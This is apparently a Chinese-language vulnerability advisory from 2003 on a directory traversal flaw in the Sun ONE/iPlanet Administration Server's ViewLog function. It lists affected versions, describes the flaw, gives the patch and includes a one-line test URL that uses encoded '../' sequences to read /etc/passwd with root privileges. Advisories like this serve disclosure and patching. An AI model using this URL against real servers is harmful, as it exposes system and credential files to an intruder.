|
|
Sun One/IPlanet Administration Server目录遍历漏洞
发布时间:2003-08-08
更新时间:2003-08-08
严重程度:高
威胁程度:读取受限文件
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:8367
受影响系统iPlanet Directory Server 5.0
iPlanet Directory Server 5.1 SP2
iPlanet Directory Server 5.1 SP1
iPlanet Directory Server 5.1
Sun ONE Directory Server 5.1 SP2
Sun ONE Directory Server 5.1 SP1
Sun ONE Directory Server 5.1
- HP HP-UX 11i
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- RedHat Linux 7.2
- Sun Linux 5.0
- Sun Linux 5.0.3
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
+ Sun Solaris 9.0
+ Sun Solaris 9.0 _x86
Sun ONE Directory Server 5.0 SP2
Sun ONE Directory Server 5.0 SP1
Sun ONE Directory Server 5.0
- HP HP-UX 11i
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Terminal Services SP2
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Terminal Server 4.0 SP6a
- RedHat Linux 7.2
- Sun Linux 5.0
- Sun Linux 5.0.3
- Sun Solaris 8.0
- Sun Solaris 8.0 _x86
- Sun Solaris 9.0
- Sun Solaris 9.0 _x86 详细描述
iPlanet Administration Express是SUN ONE应用服务器的管理程序。其中可以通过管理服务程序查看日志信息。
但是由于对用户提交的URL参数缺少充分过滤,提交包含"%2f.."字符的参数可导致绕过日志目录,以ROOT权限查看任意系统文件内容。
测试代码
http://www.example.com:5000/admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
解决方案
使用Sun ONE Directory Server 5.2和iPlanet Directory Server 5.1 SP2 Hotfix 2.
相关信息
Jim Hardisty.
参考:http://www.securityfocus.com/archive/1/332399
相关站点:http://sunsolve.sun.com/
|
